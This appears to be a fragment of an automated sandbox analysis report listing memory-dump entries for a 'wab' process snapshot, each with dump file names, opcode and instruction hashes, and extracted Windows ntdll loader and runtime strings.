                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                  • API String ID: 0-3154609507
                  • Opcode ID: 3b3441279e95667d194c41f529c1788f46851d51a6b26c4962c0d553b6ff4b69
                  • Instruction ID: 86ef1cbf4b676dd1716716ed2dd7e28044a5056019219cee754def81d4905def
                  • Opcode Fuzzy Hash: 3b3441279e95667d194c41f529c1788f46851d51a6b26c4962c0d553b6ff4b69
                  • Instruction Fuzzy Hash: 4C41E23AA007909FCB11CF28EA70E5A7BE4AF69B50F81466DED4497351D330D800CB81
                  Strings
                  • RtlpResUltimateFallbackInfo Exit, xrefs: 2242A309
                  • RtlpResUltimateFallbackInfo Enter, xrefs: 2242A2FB
                  • PS?", xrefs: 2242A348
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: PS?"$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                  • API String ID: 0-1142678743
                  • Opcode ID: 15f643377ef0dd8553f557081afd8df153db166ef63c431b116d0be0d962ea2b
                  • Instruction ID: 2b788943e88da48ac29e4f9c3def4c8f2cba9697a2ca979c0a8299b4609a1db5
                  • Opcode Fuzzy Hash: 15f643377ef0dd8553f557081afd8df153db166ef63c431b116d0be0d962ea2b
                  • Instruction Fuzzy Hash: 3B41B035A05BA5DBEB01CF6ACA40B5977B4FF84704F2042AAED00DB352E7B9DA41CB51
                  Strings
                  • RtlCreateActivationContext, xrefs: 224929F9
                  • SXS: %s() passed the empty activation context data, xrefs: 224929FE
                  • Actx , xrefs: 224533AC
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                  • API String ID: 0-859632880
                  • Opcode ID: a259b97c3df44c0a4dfc7e21245c1f4323166fc2a4e81c8e79352e2fda6508a2
                  • Instruction ID: 57d5ca306e87b2f6dd59fa32a86a43edde88c6f3bfe40eeac16d4692fdcc7d79
                  • Opcode Fuzzy Hash: a259b97c3df44c0a4dfc7e21245c1f4323166fc2a4e81c8e79352e2fda6508a2
                  • Instruction Fuzzy Hash: 203101336003059FEB16CF68D890F963BA4AF69728F118469EE049F386CB70D991CB90
                  Strings
                  • LdrpInitializeTls, xrefs: 22491A47
                  • DLL "%wZ" has TLS information at %p, xrefs: 22491A40
                  • minkernel\ntdll\ldrtls.c, xrefs: 22491A51
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                  • API String ID: 0-931879808
                  • Opcode ID: 41be6007f7c0896be2a79d25644b32482bfcfe83acf41a26b682f60fd7cc6e9d
                  • Instruction ID: cd1ee253201aff8ae258dd6666f89ac4494017946fbc840ecf7269c7344ca8e3
                  • Opcode Fuzzy Hash: 41be6007f7c0896be2a79d25644b32482bfcfe83acf41a26b682f60fd7cc6e9d
                  • Instruction Fuzzy Hash: E6312531A40300FBE7108F59CD85F9A7BF8FB64B58F054529E988AB2A0D774AE50C7A0
                  Strings
                  • LdrpInitializationFailure, xrefs: 224A20FA
                  • minkernel\ntdll\ldrinit.c, xrefs: 224A2104
                  • Process initialization failed with status 0x%08lx, xrefs: 224A20F3
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-2986994758
                  • Opcode ID: e13a6f1ac1042cff859cdfab85ea6d416c7d43564ddae548f2ab8b3a869a553e
                  • Instruction ID: 6b2a6eb868691505554bbfe850179021d2afb82bbcbe1ff4875873194f120f1d
                  • Opcode Fuzzy Hash: e13a6f1ac1042cff859cdfab85ea6d416c7d43564ddae548f2ab8b3a869a553e
                  • Instruction Fuzzy Hash: F6F04631640308BBEB14DB0CCDA2FAA37A8EB51B48F500429FF007B2C5D2F0AA40CA80
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: #%u
                  • API String ID: 48624451-232158463
                  • Opcode ID: ea7aaee567dc606f9f0ab6ad5ce286bc949dbfdd1998b236b6412bc8acaf78ac
                  • Instruction ID: 89bcf5501f6a96c008b3201cfddf6c2f763492ae9861b55cf147ce99eea3c1ac
                  • Opcode Fuzzy Hash: ea7aaee567dc606f9f0ab6ad5ce286bc949dbfdd1998b236b6412bc8acaf78ac
                  • Instruction Fuzzy Hash: BE714D71A003499FDB01CFA8D991FAEB7F8BF58704F154169E904EB251EA34EE41CBA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$@
                  • API String ID: 0-149943524
                  • Opcode ID: e9877ee2d55349509b65505ea459d26be18bd9f857422e8d4828fa4d73bd24a0
                  • Instruction ID: a23bb5cd7398a2355ac6204e37273a88309c44a52b7712d6f5c9b05175245a89
                  • Opcode Fuzzy Hash: e9877ee2d55349509b65505ea459d26be18bd9f857422e8d4828fa4d73bd24a0
                  • Instruction Fuzzy Hash: C7327A715083518BC725CF15CA80B2EB7E1EF8CB58F20492EFA959B390E774D985CB92
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: `$`
                  • API String ID: 0-197956300
                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                  • Instruction ID: 6d0daea3e185648dfde992e809274493d7c10562aec02c1c26458dc5c655794a
                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                  • Instruction Fuzzy Hash: F1C102712043519BEB14CF24C941B2BBBE5FFD4759F044A2EFA9ACA290D778D509CB82
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: Legacy$UEFI
                  • API String ID: 2994545307-634100481
                  • Opcode ID: bbb3d853999b9361c425ce093aaa6ed9e745e65c23dad0830b9bcd68323c0c6a
                  • Instruction ID: 97a666874ff2388c67850a0b780e9fb8634a01f2608955000bb933a25fec709b
                  • Opcode Fuzzy Hash: bbb3d853999b9361c425ce093aaa6ed9e745e65c23dad0830b9bcd68323c0c6a
                  • Instruction Fuzzy Hash: A6615A71E007189FDB14CFA8CA80BAEBBB5FB48744F50416EE659EB291D731E941CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: $$$
                  • API String ID: 0-233714265
                  • Opcode ID: 1ab4d36424be61af221a398086860d4306a55d27f90998653804a1a6679b7e31
                  • Instruction ID: 357c89410f4df73f62ec7fef1c782158c555efb986b5098f644506f696345c65
                  • Opcode Fuzzy Hash: 1ab4d36424be61af221a398086860d4306a55d27f90998653804a1a6679b7e31
                  • Instruction Fuzzy Hash: 9B619D71A00B49DBDB26CFA4C680B9DBBB1FF48B08F21466DD5156B780CB74A985CB90
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: .Local\$@
                  • API String ID: 0-380025441
                  • Opcode ID: 691cca63cd3cbd4e04736cf5324ad8453f05cc896c3412c40207aae7cfff386a
                  • Instruction ID: 7deddefdca8573ee2aa3e44fa06333bf9c0a446d48c316299c8e300425f66eba
                  • Opcode Fuzzy Hash: 691cca63cd3cbd4e04736cf5324ad8453f05cc896c3412c40207aae7cfff386a
                  • Instruction Fuzzy Hash: 3131A172508704AFC311CF28C580A5BBFE8EBD8758F400A2EF9D48B210DA74DE55CB92
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: MUI
                  • API String ID: 0-1339004836
                  • Opcode ID: e7684b171fdc33ae85f76826edfefa1857af5a6b0a03a6a543fbefff3bd3ec36
                  • Instruction ID: 1055f942501ff015d3c3f5b8ba604f6d8a1b104704e129f7ea9f19be928b52f5
                  • Opcode Fuzzy Hash: e7684b171fdc33ae85f76826edfefa1857af5a6b0a03a6a543fbefff3bd3ec36
                  • Instruction Fuzzy Hash: 70826E75E00B18CFDB14CFAAC980B9DB7B1BF48754F11826AE919AB351D7709A81CF50
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: @[Q"@[Q"
                  • API String ID: 0-2625876834
                  • Opcode ID: 7a8c8803c4643058fbf8665b8f886c395f14670f6b66c57bfaa7fdb75393b105
                  • Instruction ID: f26b5a35236b2f8eedc14dbf5862424b8f6d11d9aa0d60a03a30e79693736e5b
                  • Opcode Fuzzy Hash: 7a8c8803c4643058fbf8665b8f886c395f14670f6b66c57bfaa7fdb75393b105
                  • Instruction Fuzzy Hash: 4032C076E01319DBDB14CFA8C990BAEBBB1FF54B18F14012DE805AB381EB359951CB91
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a05c438be347d259fb3aa56e03038b00834f4425c45fd82cc15e4316b934c342
                  • Instruction ID: 8bea4ff06027ea07f854722d88e94bacf3901408aa573edb25e731a332ab9168
                  • Opcode Fuzzy Hash: a05c438be347d259fb3aa56e03038b00834f4425c45fd82cc15e4316b934c342
                  • Instruction Fuzzy Hash: F0A17B71A08742DFC310CF29C580E5AFBE5BF98714F104A6EE5849B351E770EA85CB92
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ed25836ef606e25daa2f8105780404ada74446d47931cf0d9c4d3fd403e354e7
                  • Instruction ID: bb21d6911087e0a343d518b88bcc6e774e3deb2aaa9479160043329081e0771c
                  • Opcode Fuzzy Hash: ed25836ef606e25daa2f8105780404ada74446d47931cf0d9c4d3fd403e354e7
                  • Instruction Fuzzy Hash: 2A416E74D01788EFDB10CFA9C580AADBBF4FB59700F10856ED998A7211DB349951CF61
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: GlobalTags
                  • API String ID: 0-1106856819
                  • Opcode ID: 4bbe4653de247a36cc71f8e9e9f828a4c8fb72e7bcb1dc11131497d49e83b53e
                  • Instruction ID: ec638aab2b610447beac5cbc862446d124da37e300c3b9bd7f9e909b1d4f6d33
                  • Opcode Fuzzy Hash: 4bbe4653de247a36cc71f8e9e9f828a4c8fb72e7bcb1dc11131497d49e83b53e
                  • Instruction Fuzzy Hash: EA717B75E0135A9FDB18CFA8C690A9DBBB1BF58704F10816EE905AB340EB358941CB60
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: @
                  • API String ID: 0-2766056989
                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                  • Instruction ID: 1c38cd17cd3edcedb0d0a0eb53adf925c72d42b82e5260c9a1c00ddd2563b085
                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                  • Instruction Fuzzy Hash: 43618B71D11759ABDF21CFA6C940BAEBBB4FF84B14F240269E910B7290D7748E41CBA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: EXT-
                  • API String ID: 0-1948896318
                  • Opcode ID: c6551ee0294348c3abf57f277b29dc421df2144701f6b9fccf66d754626bf2fc
                  • Instruction ID: 25184b62b56ceaf18f71c0fa1cc3cbdece4b271fbeb24fa00d0a1e7093b7337a
                  • Opcode Fuzzy Hash: c6551ee0294348c3abf57f277b29dc421df2144701f6b9fccf66d754626bf2fc
                  • Instruction Fuzzy Hash: EB41A27260A7419BD712CB71C940B6BB7E8AF8CB18F100A2DFA84D7240EB34D945C793
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: PreferredUILanguages
                  • API String ID: 0-1884656846
                  • Opcode ID: 8b9034841ee881020e2f35c7f3b6d943b0c630cd07e36ee9687f5eaaee0834c1
                  • Instruction ID: d38974d3de98236013533979480750d08b5c0ac99462383bf85e6b7a09d1b613
                  • Opcode Fuzzy Hash: 8b9034841ee881020e2f35c7f3b6d943b0c630cd07e36ee9687f5eaaee0834c1
                  • Instruction Fuzzy Hash: 22419D73D00319ABDF128F95C960EEEB7B9AF45B54F01026AEA11AB350D6B4DE40D7A0
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: BinaryHash
                  • API String ID: 0-2202222882
                  • Opcode ID: 0a34a21fb888400e1a1db620610cb62300c7153f68b7ac7d0e3c457a4fde15f2
                  • Instruction ID: 27370271b20a1e26ab253ee0f6f50855b19ef72bedb40047ccd83ab8642596fe
                  • Opcode Fuzzy Hash: 0a34a21fb888400e1a1db620610cb62300c7153f68b7ac7d0e3c457a4fde15f2
                  • Instruction Fuzzy Hash: 4D4124B1D0172DAADB21CB50CC80FEE7B7CAB55754F0045E9EA18AB140DB709F898FA5
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: kLsE
                  • API String ID: 0-3058123920
                  • Opcode ID: fa21206ad0950fd76742f3f79bf6678d6dc6f726737dc929688df6ca16500a0e
                  • Instruction ID: 08796c73d566aa038de9b82599a8a44c778903fbe8ad2423fa1baeca1b10004c
                  • Opcode Fuzzy Hash: fa21206ad0950fd76742f3f79bf6678d6dc6f726737dc929688df6ca16500a0e
                  • Instruction Fuzzy Hash: 31416A715813504BE712DF69C985FA53BE8EB50B68F118A1DED909B3CDCBBC4882C7A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: Flst
                  • API String ID: 0-2374792617
                  • Opcode ID: 31fd45e44b799326ca781a5d188ce27fe9dc1d69ec4ccef655cdbb138657ad35
                  • Instruction ID: 9c2ac7a2c7742775bacc932db1cac6474a42993ca28dcab0fe7bc9956894a888
                  • Opcode Fuzzy Hash: 31fd45e44b799326ca781a5d188ce27fe9dc1d69ec4ccef655cdbb138657ad35
                  • Instruction Fuzzy Hash: 13419AB1A057019FC305CF28C580A16FFE4EB59718F10866EE999CF341DB71D992CBA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: Actx
                  • API String ID: 0-89312691
                  • Opcode ID: 61417db9ec51827312585a7c0f2de7d12bc6d1f8eac20b76efbc1b6b21cb69c4
                  • Instruction ID: e490cfd1d1f58624a1891daa53324b3fd3a549d848ae7f9672fa1e9e285e829d
                  • Opcode Fuzzy Hash: 61417db9ec51827312585a7c0f2de7d12bc6d1f8eac20b76efbc1b6b21cb69c4
                  • Instruction Fuzzy Hash: 2911B430715F128BD71D4B0B8D70B26B2D5EB85354F30832AD590CB391D671DC82CB80
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrCreateEnclave
                  • API String ID: 0-3262589265
                  • Opcode ID: 38056ca07168620c455131d8a19f5f90cbe991b1ce447821e1919c71ce5af795
                  • Instruction ID: 2adbe1e63fed038f6656f6aad281944a5abb1478ccbc60b4314ea2a72b62d750
                  • Opcode Fuzzy Hash: 38056ca07168620c455131d8a19f5f90cbe991b1ce447821e1919c71ce5af795
                  • Instruction Fuzzy Hash: E62102B15183449FD310CF2AC954A9BFBE8FBE5B40F404A1EB9949B264D7B09504CB92
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c6c084d9bb031afbbf470732043fa44a491147d563390b2e66cd940c1533e56
                  • Instruction ID: ac4ad15d6b73a19c12562946a138a4ff3fa5881f248679e247e99ce76a29cb08
                  • Opcode Fuzzy Hash: 9c6c084d9bb031afbbf470732043fa44a491147d563390b2e66cd940c1533e56
                  • Instruction Fuzzy Hash: 6742AD71A007168FDB08CF58C980AEEB7B2FF88714F54856DD962AB351DB34E942CB90
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
